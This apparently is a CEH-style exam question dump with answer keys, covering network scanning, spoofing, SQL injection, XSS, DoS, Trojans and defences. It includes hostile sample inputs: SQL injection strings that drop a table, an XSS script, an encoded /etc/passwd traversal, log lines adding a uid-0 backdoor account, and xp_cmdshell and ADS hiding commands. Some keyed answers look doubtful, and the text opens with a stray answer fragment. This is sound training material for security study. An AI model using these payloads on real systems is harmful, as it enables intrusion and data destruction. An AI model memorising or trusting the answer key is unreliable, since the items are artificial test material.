a. 10.0.0.253 is performing an IP scan against 10.0.0.0/24,10.0.0.252 is performing a port scan against 10.0.0.2.

You want to carry out session hijacking on a remote server. The server and the client are communicating via TCP after a successful TCP three way handshake. The server has just received packet #120 from the client. The client has a receive window of 200 and the server has a receive window of 250. Within what range of sequence numbers should a packet, sent by the client fall in order to be accepted by the server? a. 121-371 b. 120-370 c. 200-250 d. 121-231 e. 120-321

a. 121-371

Steven the hacker realizes the network administrator of Acme Corporation is using syskey in Windows 2008 Server to protect his resources in the organization. Syskey independently encrypts the hashes so that physical access to the server, tapes, or ERDs is only first step to cracking the passwords. Steven must break through the encryption used by syskey before he can attempt to use brute force dictionary attacks on the hashes. Steven runs a program called "SysCracker" targeting the Windows 2008 Server machine in attempting to crack the hash used by Syskey. He needs to configure the encryption level before he can launch the attack. How many bits does Syskey use for encryption? a. 128-bit encryption b. 256-bit encryption c. 40-bit encryption d. 64-bit encryption

a. 128-bit encryption

What ports should be blocked on the firewall to prevent NetBIOS traffic from not coming through the firewall if your network is comprised of Windows NT, 2000, and XP?(Choose all that apply.) a. 135 b. 161 c. 445 d. 110 e. 1024 f. 139

a. 135 c. 445 f. 139

Diffie-Hellman (DH) groups determine the strength of the key used in the key exchange process. Which of the following is the correct bit size of the Diffie-Hellman (DH) group 5? a. 1536 bit key b. 2048 bit key c. 768 bit key d. 1025 bit key

a. 1536 bit key

What is the broadcast address for the subnet 190.86.168.0/22? a. 190.86.171.255 b. 190.86.255.255 c. 190.86.169.255 d. 190.86.168.255

a. 190.86.171.255

You receive an email with the following message: Hello Steve, We are having technical difficulty in restoring user database record after the recent blackout. Your account data is corrupted. Please logon to the SuperEmailServices.com and change your password. http://[email protected]/support/logon.htm If you do not reset your password within 7 days, your account will be permanently disabled locking you out from our e-mail services. Sincerely, Technical Support SuperEmailServices From this e-mail you suspect that this message was sent by some hacker since you have been using their e-mail services for the last 2 years and they have never sent out an e-mail such as this. You also observe the URL in the message and confirm your suspicion about 0xde.0xad.0xbde.0xef which looks like hexadecimal numbers. You immediately enter the following at Windows 2000 command prompt: Ping 0xde.0xad.0xbe.0xef You get a response with a valid IP address. What is the obstructed IP address in the e-mail URL? a. 222.173.190.239 b. 199.223.23.45 c. 233.34.45.64 d. 54.23.56.55

a. 222.173.190.239

Which of the following statement correctly defines ICMP Flood Attack? (Select 2 answers) Picture: (Test 1 #99) http://blendedlearning.infotecpro.com/file.php/5/2014_CEH/414-098.gif a. A DDoS ICMP flood attack occurs when the zombies send large volumes of ICMP_ECHO_REPLY packets to the victim system. b. Bogus ECHO reply packets are flooded on the network spoofing the IP and MAC address c. ECHO packets are flooded on the network saturating the bandwidth of the subnet causing denial of service d. The ICMP packets signal the victim system to reply and the combination of traffic saturates the bandwidth of the victim's network

a. A DDoS ICMP flood attack occurs when the zombies send large volumes of ICMP_ECHO_REPLY packets to the victim system. d. The ICMP packets signal the victim system to reply and the combination of traffic saturates the bandwidth of the victim's network

A Trojan horse is a destructive program that masquerades as a benign application. The software initially appears to perform a desirable function for the user prior to installation and/or execution, but in addition to the expected function steals information or harms the system. Picture: (Test 2 #14) http://blendedlearning.infotecpro.com/file.php/5/2014_CEH/414-105.gif The challenge for an attacker is to send a convincing file attachment to the victim, which gets easily executed on the victim machine without raising any suspicion. Today's end users are quite knowledgeable about malwares and viruses. Instead of sending games and fun executables, Hackers today are quite successful in spreading the Trojans using Rogue security software. What is Rogue security software? a. A Fake AV program that claims to rid a computer of malware,but instead installs spyware or other malware onto the computer. This kind of software is known as rogue security software. b. Rogue security software is based on social engineering technique in which the attackers lures victim to visit spear phishing websites c. A flash file extension to Firefox that gets automatically installed when a victim visits rogue software disabling websites d. This software disables firewalls and establishes reverse connecting tunnel between the victim's machine and that of the attacker

a. A Fake AV program that claims to rid a computer of malware,but instead installs spyware or other malware onto the computer. This kind of software is known as rogue security software.

While investigating a claim of a user downloading illegal material, the investigator goes through the files on the suspect's workstation. He comes across a file that is just called "file.txt" but when he opens it, he finds the following: Picture: (Test 6 #12) http://blendedlearning.infotecpro.com/file.php/5/2014_CEH/414-511.gif What can he infer from this file? a. A buffer overflow b. A picture that has been renamed with a .txt extension c. An encrypted file d. An encoded file

a. A buffer overflow

A tester has been using the msadc.pl attack script to execute arbitrary commands on a Windows NT4 web server. While it is effective, the tester finds it tedious to perform extended functions. On further research, the tester come across a perl script that runs the following msadc functions:system("perl msadc.pl -h $host -C \"echo open $your >testfile\""); Picture: (Test 5 #61) http://blendedlearning.infotecpro.com/file.php/5/2014_CEH/414-461.gif Which exploit is indicated by this script? a. A chained exploit b. A denial of service exploit c. A buffer overflow exploit d. A SQL injection exploit

a. A chained exploit

You are doing IP spoofing while you scan your target. You find that the target has port 23 open. Anyway you are unable to connect. Why? a. A firewall is blocking port 23 b. The OS does not reply to telnet even if port 23 is open c. You need an automated telnet tool d. You cannot spoof + TCP

a. A firewall is blocking port 23

Which statement best describes a server type under an N-tier architecture? a. A group of servers with a unique role b. A single server with a specific role c. A single server at a specific layer d. A group of servers at a specific layer

a. A group of servers with a unique role

If you come across a sheepdip machaine at your client site, what would you infer? a. A sheepdip computer is used only for virus checking. b. A sheepdip computer is another name for honeypop. c. A sheepdip computer defers a denial of service attack. d. A sheepdip coordinates several honeypots.

a. A sheepdip computer is used only for virus checking.

What results will the following command yield. 'NMAP -sS -O -p 123-153 192.168.100.3'? a. A stealth scan,determine operating system,and scanning ports 123 to 153 b. A stealth scan,checking all open ports excluding ports 123 to 153 c. A stealth scan,opening port 123 and 153 d. A stealth scan,checking open ports 123 to 153

a. A stealth scan,determine operating system,and scanning ports 123 to 153

What is the main reason the use of a stored biometric is vulnerable to an attack? a. A stored biometric can be stolen and used by an attacker to impersonate the individual identified by the biometric. b. A stored biometric is no longer "something you are" and instead becomes "something you have". c. Authentication using a stored biometric compares a copy to a copy instead of the original to a copy. d. The digital representation of the biometric might not be unique,even if the physical characteristic is unique.

a. A stored biometric can be stolen and used by an attacker to impersonate the individual identified by the biometric.

Which one of the following attacks will pass through a network layer intrusion detection system undetected? a. A test.cgi attack b. A DNS spoofing attack c. A SYN flood attack d. A teardrop attack

a. A test.cgi attack

In the context of Trojans, what is the definition of a Wrapper? a. A tool used to bind the Trojan with a legitimate file b. An encryption tool to protect the Trojan c. A tool used to calculate bandwidth and CPU cycles wasted by the Trojan d. A tool used to encapsulate packets within a new header and footer

a. A tool used to bind the Trojan with a legitimate file

What would best be defined as a security test on services against a known vulnerability database using an automated tool? a. A vulnerability assessment b. A penetration test c. A privacy review d. A server audit

a. A vulnerability assessment

Which of the following statements best describes the term Vulnerability? a. A weakness or error that can lead to a compromise b. The loss potential of a threat. c. An action or event that might prejudice security d. An agent that has the potential to take advantage of a weakness

a. A weakness or error that can lead to a compromise

TCP packets transmitted in either direction after the initial three-way handshake will have which of the following bit set? a. ACK flag b. SYN flag c. XMAS flag d. FIN flag

a. ACK flag

What file system vulnerability does the following command take advantage of? type c:\anyfile.exe > c:\winnt\system32\calc.exe:anyfile.exe a. ADS b. Backdoor access c. HFS d. NTFS

a. ADS

What type of encryption does WPA2 use? a. AES-CCMP 128 bit b. MD5 48 bit c. DES 64 bit d. SHA 160 bit

a. AES-CCMP 128 bit

An NMAP scan of a server shows port 25 is open. What risk could this pose? a. Active mail relay b. Open printer sharing c. Clear text authentication d. Web portal data leak

a. Active mail relay

Which of the following is NOT a valid NetWare access level? a. Administrator b. Not Logged in c. Logged in d. Console Access

a. Administrator

ook at the following SQL query. SELECT * FROM product WHERE PCategory='computers' or 1=1--' What will it return? Select the best answer. a. All computers and everything else b. Everything except computers c. All computers and all 1's d. All computers

a. All computers and everything else

Jim is having no luck performing a penetration test in XYZ's network. He is running the tests from home and has downloaded every security scanner that he could lay his hands on. Despite knowing the IP range of all the systems, and the exact network configuration, Jim is unable to get any useful results. Why is Jim having these problems? a. All of the answers apply. b. Security scanners are not designed to do testing through a firewall. c. Security scanners are only as smart as their database and cannot find unpublished vulnerabilities. d. Security scanners cannot perform vulnerability linkage.

a. All of the answers apply.

What are two things that are possible when scanning UDP ports? (Choose two.) a. An ICMP message will be returned b. The four-way handshake will not be completed c. Nothing d. A reset will be returned e. An RFC 1294 message will be returned

a. An ICMP message will be returned c. Nothing

Which of the following statements would NOT be a proper definition for a Trojan Horse? a. An authorized program that has been designed to capture keyboard keystroke while the user is unaware of such activity being performed b. Any program that appears to perform a desirable and necessary function but that (because of unauthorized code within it that is unknown to the user) performs functions unknown (and definitely unwanted) by the user c. A legitimate program that has been altered by the placement of unauthorized code within it; this code performs functions unknown (and probably unwanted) by the user d. An unauthorized program contained within a legitimate program. This unauthorized program performs functions unknown (and probably unwanted) by the user

a. An authorized program that has been designed to capture keyboard keystroke while the user is unaware of such activity being performed

What is one thing a tester can do to ensure that the software is trusted and is not changing or tampering with critical data on the back end of a system it is loaded on? a. Analysis of interrupts within the software b. Secure coding principles c. Proper testing d. Systems security and architecture review

a. Analysis of interrupts within the software

In the context of using PKI, when Sven wishes to send a secret message to Bob, he looks up Bob's public key in a directory, uses it to encrypt the message before sending it off. Bob then uses his private key to decrypt the message and reads it. No one listening on can decrypt the message. Anyone can send an encrypted message to Bob but only Bob can read it. Thus, although many people may know Bob's public key and use it to verify Bob's signature, they cannot discover Bob's private key and use it to forge digital signatures. What does this principle refer to? a. Asymmetry b. Symmetry c. Non-repudiation d. Irreversibility

a. Asymmetry

When a normal TCP connection starts, a destination host receives a SYN (synchronize/start) packet from a source host and sends back a SYN/ACK (synchronize acknowledge). The destination host must then hear an ACK (acknowledge) of the SYN/ACK before the connection is established. This is referred to as the "TCP three-way handshake." While waiting for the ACK to the SYN ACK, a connection queue of finite size on the destination host keeps track of connections waiting to be completed. This queue typically empties quickly since the ACK is expected to arrive a few milliseconds after the SYN ACK. How would an attacker exploit this design by launching TCP SYN attack? a. Attacker floods TCP SYN packets with random source addresses towards a victim host b. Attacker generates TCP SYN packets with random destination addresses towards a victim host c. Attacker generates TCP RST packets with random source addresses towards a victim host d. Attacker generates TCP ACK packets with random source addresses towards a victim host

a. Attacker floods TCP SYN packets with random source addresses towards a victim host

Botnets are networks of compromised computers that are controlled remotely and surreptitiously by one or more cyber criminals. How do cyber criminals infect a victim's computer with bots? (Select 4 answers) a. Attackers use websites to host the bots utilizing Web Browser vulnerabilities b. Home computers that have security vulnerabilities are prime targets for botnets c. Spammers scan the Internet looking for computers that are unprotected and use these "open- doors" to install malicious software d. Attackers physically visit every victim's computer to infect them with malicious software e. Attackers use phishing or spam emails that contain links or attachments

a. Attackers use websites to host the bots utilizing Web Browser vulnerabilities b. Home computers that have security vulnerabilities are prime targets for botnets c. Spammers scan the Internet looking for computers that are unprotected and use these "open- doors" to install malicious software e. Attackers use phishing or spam emails that contain links or attachments

Assuring two systems that are using IPSec to protect traffic over the internet, what type of general attack could compromise the data? (2 answers) a. Back Orifice Attack b. Spoof Attack c. Trojan Horse Attack d. Man inthe Middle Attack e. Smurf Attack

a. Back Orifice Attack c. Trojan Horse Attack

Buffer X in an Accounting application module for Brownies Inc. can contain 200 characters. The programmer makes an assumption that 200 characters are more than enough. Because there were no proper boundary checks being conducted, Bob decided to insert 400 characters into the 200-character buffer. (Overflows the buffer). Below is the code snippet: Picture: (Test 2 #86) http://blendedlearning.infotecpro.com/file.php/5/2014_CEH/414-192.gif How can you protect/fix the problem of your application as shown above? a. Because the counter starts with 0,we would stop when the counter is less than 200 b. Add a separate statement to signify that if we have written 200 characters to the buffer, the stack should stop because it cannot hold any more data c. Add a separate statement to signify that if we have written less than 200 characters to the buffer,the stack should stop because it cannot hold any more data d. Because the counter starts with 0,we would stop when the counter is more than 200

a. Because the counter starts with 0,we would stop when the counter is less than 200 b. Add a separate statement to signify that if we have written 200 characters to the buffer, the stack should stop because it cannot hold any more data

Bill is a security analyst for his company. All the switches used in the company's office are Cisco switches. Bill wants to make sure all switches are safe from ARP poisoning. How can Bill accomplish this? a. Bill can use the command: ip dhcp snooping. b. Bill could use the command: ip arp no flood. c. Bill can use the command: no ip snoop. d. He could use the command: ip arp no snoop.

a. Bill can use the command: ip dhcp snooping.

Hampton is the senior security analyst for the city of Columbus in Ohio. His primary responsibility is to ensure that all physical and logical aspects of the city's computer network are secure from all angles. Bill is an IT technician that works with Hampton in the same IT department. Bill's primary responsibility is to keep PC's and servers up to date and to keep track of all the agency laptops that the company owns and lends out to its employees. After Bill setup a wireless network for the agency, Hampton made sure that everything was secure. He instituted encryption, rotating keys, turned off SSID broadcasting, and enabled MAC filtering. According to agency policy, only company laptops are allowed to use the wireless network, so Hampton entered all the MAC addresses for those laptops into the wireless security utility so that only those laptops should be able to access the wireless network. Hampton does not keep track of all the laptops, but he is pretty certain that the agency only purchases Dell laptops. Hampton is curious about this because he notices Bill working on a Toshiba laptop one day and saw that he was on the Internet. Instead of jumping to conclusions, Hampton decides to talk to Bill's boss and see if they had purchased a Toshiba laptop instead of the usual Dell. Bill's boss said no, so now Hampton is very curious to see how Bill is accessing the Internet. Hampton does site surveys every couple of days, and has yet to see any outside wireless network signals inside the company's building. How was Bill able to get Internet access without using an agency laptop? a. Bill spoofed the MAC address of Dell laptop b. Bill connected to a Rogue access point c. Bill brute forced the Mac address ACLs d. Toshiba and Dell laptops share the same hardware address

a. Bill spoofed the MAC address of Dell laptop

Blane is a security analyst for a law firm. One of the lawyers needs to send out an email to a client but he wants to know if the email is forwarded on to any other recipients. The client is explicitly asked not to re-send the email since that would be a violation of the lawyer's and client's agreement for this particular case. What can Blane use to accomplish this? a. Blane can use a service such as ReadNotify tracking tool. b. A service such as HTTrack would accomplish this. c. Blane could use MetaGoofil tracking tool. d. He can use a split-DNS service to ensure the email is not forwarded on.

a. Blane can use a service such as ReadNotify tracking tool.

If a token and 4-digit personal identification number (PIN) are used to access a computer system and the token performs off-line checking for the correct PIN, what type of attack is possible? a. Brute force b. Smurf c. Birthday d. Man-in-the-middle

a. Brute force

_____ is the process of converting something from one representation to the simplest form. It deals with the way in which systems convert data from one form to another. a. Canonicalization b. UCS transformation formats c. Character Encoding d. Character Mapping

a. Canonicalization

After studying the following log entries, what is the attacker ultimately trying to achieve as inferred from the log sequence? 1. mkdir -p /etc/X11/applnk/Internet/.etc 2. mkdir -p /etc/X11/applnk/Internet/.etcpasswd 3. touch -acmr /etc/passwd /etc/X11/applnk/Internet/.etcpasswd 4. touch -acmr /etc /etc/X11/applnk/Internet/.etc 5. passwd nobody -d 6. /usr/sbin/adduser dns -d/bin -u 0 -g 0 -s/bin/bash 7. passwd dns -d 8. touch -acmr /etc/X11/applnk/Internet/.etcpasswd /etc/passwd 9. touch -acmr /etc/X11/applnk/Internet/.etc /etc a. Change the files Modification Access Creation times b. Download rootkits and passwords into a new directory c. Extract information from a local directory d. Change password of user nobody

a. Change the files Modification Access Creation times

The following script shows a simple SQL injection. The script builds an SQL query by concatenating hard-coded strings together with a string entered by the user: var shipcity: shipCity = Request. form ("shipCity"); Var sql = "select + from ordersTable where shipCity = '"+ shipCity +"'"; The user is prompted to enter the name of a city on a Web form. If she enters Chicago, the query assembled by the script looks similar to the following: SELECT * FROM OrdersTable WHERE ShipCity = 'Chicago' How will you delete the OrdersTable from the database using SQL Injection? a. Chicago'; drop table OrdersTable -- b. EXEC; SELECT * OrdersTable > DROP -- c. cmdshell'; 'del c:\sql\mydb\OrdersTable' // d. Delete table'blah'; OrdersTable --

a. Chicago'; drop table OrdersTable --

An attacker has captured a target file that is encrypted with public key cryptography. Which of the attacks below is likely to be used to crack the target file? a. Chosen plain-text attack b. Replay attack c. Timing attack d. Memory trade-off attack

a. Chosen plain-text attack

Which of the following buffer overflow exploits are related to Microsoft IIS web server? (Choose three) a. Code Red Worm b. Indexing services ISAPI extension buffer overflow c. NeXT buffer overflow d. Internet Printing Protocol (IPP) buffer overflow

a. Code Red Worm b. Indexing services ISAPI extension buffer overflow d. Internet Printing Protocol (IPP) buffer overflow

What is the name of the international standard that establishes a baseline level of confidence in the security functionality of IT products by providing a set of requirements for evaluation? a. Common Criteria b. Blue Book c. ISO 26029 d. The Wassenaar Agreement

a. Common Criteria

Rebecca has noted multiple entries in her logs about users attempting to connect on ports that are either not opened or ports that are not for public usage. How can she restrict this type of abuse by limiting access to only specific IP addresses that are trusted by using one of the built-in Linux Operating System tools? a. Configure rules using ipchains. b. Install an intrusion detection system on her computer such as Snort. c. Ensure all files have at least a 755 or more restrictive permissions. d. Configure and enable portsentry on his server.

a. Configure rules using ipchains.

What port scanning method is the most reliable but also the most detectable? a. Connect Scanning b. Idlescan Scanning c. Verbose Scanning d. Null Scanning e. Half Scanning f. ICMP Scanning

a. Connect Scanning

Which type of Nmap scan is the most reliable, but also the most visible, and likely to be picked up by and IDS? a. Connect scan b. ACK scan c. FIN scan d. SYN scan e. RST scan

a. Connect scan

While attempting to discover the remote operating system on the target computer, you receive the following results from an nmap scan: Picture: (Test 6 #52) http://blendedlearning.infotecpro.com/file.php/5/2014_CEH/414-558.gif Remote operating system guess: Too many signatures match to reliably guess the OS. Nmap run completed -- 1 IP address (1 host up) scanned in 277.483 seconds What should be your next step to identify the OS? a. Connect to the active services and review the banner information b. Perform a tcp traceroute to the system using port 53 c. Perform a firewalk with that system as the target IP d. Run an nmap scan with the -v-v option to give a better output

a. Connect to the active services and review the banner information

Bob reads an article about how insecure wireless networks can be. He gets approval from his management to implement a policy of not allowing any wireless devices on the network. What other steps does Bob have to take in order to successfully implement this? (Select 2 answer.) a. Continuously survey the area for wireless devices. b. Disable all wireless protocols at the firewall. c. Train users in the new policy. d. Disable SNMP on the network so that wireless devices cannot be configured.

a. Continuously survey the area for wireless devices. c. Train users in the new policy.

How would you describe a simple yet very effective mechanism for sending and receiving unauthorized information or data between machines without alerting any firewalls and IDS's on a network? a. Covert Channel b. Crafted Channel c. Bounce Channel d. Deceptive Channel

a. Covert Channel

Take a look at the following attack on a Web Server using obstructed URL: http://www.example.com/script.ext?template%2e%2e%2e%2e%2e%2f%2e%2f%65%74%63%2f %70%61%73%73%77%64 The request is made up of: %2e%2e%2f%2e%2e%2f%2e%2f% = ../../../ %65%74%63 = etc %2f = / %70%61%73%73%77%64 = passwd How would you protect information systems from these attacks? a. Create rules in IDS to alert on strange Unicode requests. b. Use SSL authentication on Web Servers. c. Enable Active Scripts Detection at the firewall and routers. d. Configure Web Server to deny requests involving Unicode characters.

a. Create rules in IDS to alert on strange Unicode requests.

Kevin sends an email invite to Chris to visit a forum for security professionals. Chris clicks on the link in the email message and is taken to a web based bulletin board. Unknown to Chris, certain functions are executed on his local system under his privileges, which allow Kevin access to information used on the BBS. However, no executables are downloaded and run on the local system. What would you term this attack? a. Cross Site Scripting b. Phishing c. Denial of Service d. Backdoor installation

a. Cross Site Scripting

Company A and Company B have just merged and each has its own Public Key Infrastructure (PKI). What must the Certificate Authorities (CAs) establish so that the private PKIs for Company A and Company B trust one another and each private PKI can validate digital certificates from the other company? a. Cross certification b. Poly key reference c. Cross-site exchange d. Poly key exchange

a. Cross certification

While testing the company's web applications, a tester attempts to insert the following test script into the search area on the company's web sitE. <script> alert(" Testing Testing Testing ")</script> Afterwards, when the tester presses the search button, a pop-up box appears on the screen with the text: "Testing Testing Testing". Which vulnerability has been detected in the web application? a. Cross-site scripting b. Buffer overflow c. Distributed denial of service d. Cross-site request forgery

a. Cross-site scripting

Joseph was the Web site administrator for the Mason Insurance in New York, who's main Web site was located at www.masonins.com. Joseph uses his laptop computer regularly to administer the Web site. One night, Joseph received an urgent phone call from his friend, Smith. According to Smith, the main Mason Insurance web site had been vandalized! All of its normal content was removed and replaced with an attacker's message ''Hacker Message: You are dead! Freaks! From his office, which was directly connected to Mason Insurance's internal network, Joseph surfed to the Web site using his laptop. In his browser, the Web site looked completely intact. No changes were apparent. Joseph called a friend of his at his home to help troubleshoot the problem. The Web site appeared defaced when his friend visited using his DSL connection. So, while Smith and his friend could see the defaced page, Joseph saw the intact Mason Insurance web site. To help make sense of this problem, Joseph decided to access the Web site using his dial-up ISP. He disconnected his laptop from the corporate internal network and used his modem to dial up the same ISP used by Smith. After his modem connected, he quickly typed www.masonins.com in his browser to reveal the following web page: H@cker Mess@ge: Y0u @re De@d! Fre@ks! After seeing the defaced Web site, he disconnected his dial-up line, reconnected to the internal network, and used Secure Shell (SSH) to log in directly to the Web server. He ran Tripwire against the entire Web site, and determined that every system file and all the Web content on the server were intact. How did the attacker accomplish this hack? a. DNS poisoning b. SQL injection c. ARP spoofing d. Routing table injection

a. DNS poisoning

Bob was frustrated with his competitor, Brownies Inc., and decided to launch an attack that would result in serious financial losses. He planned the attack carefully and carried out the attack at the appropriate moment. Meanwhile, Trent, an administrator at Brownies Inc., realized that their main financial transaction server had been attacked. As a result of the attack, the server crashed and Trent needed to reboot the system, as no one was able to access the resources of the company. This process involves human interaction to fix it. What kind of Denial of Service attack was best illustrated in the scenario above? a. DoS attacks which involves crashing a network or system b. DoS attacks which involves flooding a network or system c. Simple DDoS attack d. DoS attacks which is done accidentally or deliberately

a. DoS attacks which involves crashing a network or system

Which one of the following is defined as the process of distributing incorrect Internet Protocol (IP) addresses/names with the intent of diverting traffic? a. Domain Name Server (DNS) poisoning b. Port scanning c. Network aliasing d. Reverse Address Resolution Protocol (ARP)

a. Domain Name Server (DNS) poisoning

Bob is acknowledged as a hacker of repute and is popular among visitors of "underground" sites. Bob is willing to share his knowledge with those who are willing to learn, and many have expressed their interest in learning from him. However, this knowledge has a risk associated with t, as it can be used for malevolent attacks as well. In this context, what would be the most affective method to bridge the knowledge gap between the "black" hats or crackers and the "white" hats or computer security professionals? (Choose the best answer) a. Educate everyone with books,articles and training on risk analysis, vulnerabilities and safeguards. b. Make obtaining either a computer security certification or accreditation easier to achieve so more individuals feel that they are a part of something larger than life. c. Train more National Guard and reservist in the art of computer security to help out in times of emergency or crises. d. Hire more computer security monitoring personnel to monitor computer systems and networks.

a. Educate everyone with books,articles and training on risk analysis, vulnerabilities and safeguards.

How do you defend against ARP Poisoning attack? (Select 2 answers) Picture: (Test 3 #21) http://blendedlearning.infotecpro.com/file.php/5/2014_CEH/414-228.gif a. Enable DHCP Snooping Binding Table b. Enable Dynamic ARP Inspection c. Enable MAC snooping Table d. Restrict ARP Duplicates

a. Enable DHCP Snooping Binding Table b. Enable Dynamic ARP Inspection

Let's imagine three companies (A, B and C), all competing in a challenging global environment. Company A and B are working together in developing a product that will generate a major competitive advantage for them. Company A has a secure DNS server while company B has a DNS server vulnerable to spoofing. With a spoofing attack on the DNS server of company B, company C gains access to outgoing e-mails from company ~ How do you prevent DNS spoofing? (Select the Best Answer.) a. Install DNS Anti-spoofing b. Install DNS logger and track vulnerable packets c. Disable DNS Zone Transfer d. Disable DNS timeouts

a. Install DNS Anti-spoofing

The SNMP Read-Only Community String is like a password. The string is sent along with each SNMP Get-Request and allows (or denies) access to a device. Most network vendors ship their equipment with a default password of "public". This is the so-called "default public community string". How would you keep intruders from getting sensitive information regarding the network devices using SNMP? (Select 2 answers) a. Enable SNMPv3 which encrypts username/password authentication b. Use your company name as the public community string replacing the default 'public' c. The default configuration provided by device vendors is highly secure and you don't need to change anything d. Enable IP filtering to limit access to SNMP device

a. Enable SNMPv3 which encrypts username/password authentication d. Enable IP filtering to limit access to SNMP device

When analyzing the IDS logs, the system administrator notices connections from outside of the LAN have been sending packets where the Source IP address and Destination IP address are the same. There have been no alerts sent via email or logged in the IDS. Which type of an alert is this? a. False negative b. True negative c. False positive d. True positive

a. False negative

Kevin has been asked to write a short program to gather user input for a web application. He likes to keep his code neat and simple. He chooses to use printf(str) where he should have ideally used printf(?s? str). What attack will his program expose the web application to? a. Format String Attack b. Cross Site Scripting c. Unicode Traversal Attack d. SQL injection Attack

a. Format String Attack

What is "Hacktivism"? a. Hacking for a cause b. An association which groups activists c. None of the above d. Hacking ruthlessly

a. Hacking for a cause

Windows LAN Manager (LM) hashes are known to be weak. Which of the following are known weaknesses of LM? (Choose three) a. Hashes are sent in clear text over the network. b. Effective length is 7 characters. c. Converts passwords to uppercase. d. Makes use of only 32 bit encryption.

a. Hashes are sent in clear text over the network. b. Effective length is 7 characters. c. Converts passwords to uppercase.

A distributed port scan operates by: a. Having multiple computers each scan a small number of ports,then correlating the results b. Using denial-of-service software against a range of TCP ports c. Blocking access to the scanning clients by the targeted host d. Blocking access to the targeted host by each of the distributed scanning clients

a. Having multiple computers each scan a small number of ports,then correlating the results

To see how some of the hosts on your network react, Winston sends out SYN packets to an IP range. A number of IPs respond with a SYN/ACK response. Before the connection is established he sends RST packets to those hosts to stop the session. Winston has done this to see how his intrusion detection system will log the traffic. What type of scan is Winston attempting here? a. He is using a half-open scan to find live hosts on your network. b. He is utilizing a SYN scan to find live hosts that are listening on your network. c. This type of scan he is using is called a NULL scan. d. Winston is attempting to find live hosts on your company's network by using an XMAS scan.

a. He is using a half-open scan to find live hosts on your network.

In the context of password security, a simple dictionary attack involves loading a dictionary file (a text file full of dictionary words) into a cracking application such as L0phtCrack or John the Ripper, and running it against user accounts located by the application. The larger the word and word fragment selection, the more effective the dictionary attack is. The brute force method is the most inclusive, although slow. It usually tries every possible letter and number combination in its automated exploration. If you would use both brute force and dictionary methods combined together to have variation of words, what would you call such an attack? a. Hybrid b. Full Blown c. BruteDics d. Thorough

a. Hybrid

A specific site received 91 ICMP_ECHO packets within 90 minutes from 47 different sites. 77 of the ICMP_ECHO packets had an ICMP ID:39612 and Seq:57072. 13 of the ICMP_ECHO packets had an ICMP ID:0 and Seq:0. What can you infer from this information? a. ICMP ID and Seq numbers were most likely set by a tool and not by the operating system b. All 77 packets came from the same LAN segment and hence had the same ICMP ID and Seq number c. 13 packets were from an external network and probably behind a NAT,as they had an ICMP ID 0 and Seq 0 d. The packets were sent by a worm spoofing the IP addresses of 47 infected sites

a. ICMP ID and Seq numbers were most likely set by a tool and not by the operating system

This type of Port Scanning technique splits TCP header into several packets so that the packet filters are not able to detect what the packets intends to do. a. IP Fragment Scanning b. Inverse TCP flag scanning c. UDP Scanning d. ACK flag scanning

a. IP Fragment Scanning

This IDS defeating technique works by splitting a datagram (or packet) into multiple fragments and the IDS will not spot the true nature of the fully assembled datagram. The datagram is not reassembled until it reaches its final destination. It would be a processor-intensive task for IDS to reassemble all fragments itself, and on a busy system the packet will slip through the IDS onto the network. What is this technique called? a. IP Fragmentation or Session Splicing b. IP Routing or Packet Dropping c. IP Splicing or Packet Reassembly d. IDS Spoofing or Session Assembly

a. IP Fragmentation or Session Splicing

Choose one of the following pseudo codes to describe this statement: "If we have written 200 characters to the buffer variable, the stack should stop because it cannot hold any more data." a. If (I >=200) then exit (1) b. If (I <= 200) then exit (1) c. If (I < 200) then exit (1) d. If (I > 200) then exit (1)

a. If (I >=200) then exit (1)

John runs a Web server, IDS and firewall on his network. Recently his Web server has been under constant hacking attacks. He looks up the IDS log files and sees no intrusion attempts but the Web server constantly locks up and needs rebooting due to various brute force and buffer overflow attacks but still the IDS alerts no intrusion whatsoever. John becomes suspicious and views the Firewall logs and he notices huge SSL connections constantly hitting his Web server. Hackers have been using the encrypted HTTPS protocol to send exploits to the Web server and that was the reason the IDS did not detect the intrusions. How would John protect his network from these types of attacks?(select 2) a. Install a hardware SSL "accelerator" and terminate SSL at this layer b. Install a proxy server and terminate SSL at the proxy c. Enable the IDS to filter encrypted HTTPS traffic d. Enable the Firewall to filter encrypted HTTPS traffic

a. Install a hardware SSL "accelerator" and terminate SSL at this layer b. Install a proxy server and terminate SSL at the proxy

The intrusion detection system at a software development company suddenly generates multiple alerts regarding attacks against the company's external webserver, VPN concentrator, and DNS servers. What should the security team do to determine which alerts to check first? a. Investigate based on the potential effect of the incident. b. Investigate based on the maintenance schedule of the affected systems. c. Investigate based on the order that the alerts arrived in. d. Investigate based on the service level agreements of the systems.

a. Investigate based on the potential effect of the incident.

During a penetration test, a tester finds a target that is running MS SQL 2000 with default credentials. The tester assumes that the service is running with Local System account. How can this weakness be exploited to access the system? a. Invoking the stored procedure xp_cmdshell to spawn a Windows command shell b. Invoking the stored procedure xp_shell to spawn a Windows command shell c. Using the Metasploit psexec module setting the SA / Admin credential d. Invoking the stored procedure cmd_shell to spawn a Windows command shell

a. Invoking the stored procedure xp_cmdshell to spawn a Windows command shell

Fingerprinting an Operating System helps a cracker because: a. It informs the cracker of which vulnerabilities he may be able to exploit on your system b. It doesn't depend on the patches that have been applied to fix existing security holes c. It defines exactly what software you have installed d. It opens a security-delayed window based on the port being scanned

a. It informs the cracker of which vulnerabilities he may be able to exploit on your system

What are the limitations of Vulnerability scanners? (Select 2 answers) a. It is impossible for any,one scanning product to incorporate all known vulnerabilities in a timely manner b. The scanning speed of their scanners are extremely high c. They are highly expensive and require per host scan license d. There are often better at detecting well-known vulnerabilities than more esoteric ones e. The more vulnerabilities detected,the more tests required

a. It is impossible for any,one scanning product to incorporate all known vulnerabilities in a timely manner d. There are often better at detecting well-known vulnerabilities than more esoteric ones

What is a sheepdip? a. It is the process of checking physical media for virus before they are used in a computer b. It is a machine used to coordinate honeynets c. It is another name for Honeynet d. None of the answers apply

a. It is the process of checking physical media for virus before they are used in a computer

Which of the following is the primary objective of a rootkit? a. It replaces legitimate programs b. It provides an undocumented opening in a program c. It opens a port to provide an unauthorized service d. It creates a buffer overflow

a. It replaces legitimate programs

Jimmy, an attacker, knows that he can take advantage of poorly designed input validation routines to create or alter SQL commands to gain access to private data or execute commands in the database. What technique does Jimmy use to compromise a database? a. Jimmy can utilize this particular database threat that is an SQL injection technique to penetrate a target system b. Jimmy can utilize an incorrect configuration that leads to access with higher-than expected privilege of the database c. Jimmy can gain control of system to flood the target system with requests, preventing legitimate users from gaining access d. Jimmy can submit user input that executes an operating system command to compromise a target system

a. Jimmy can utilize this particular database threat that is an SQL injection technique to penetrate a target system

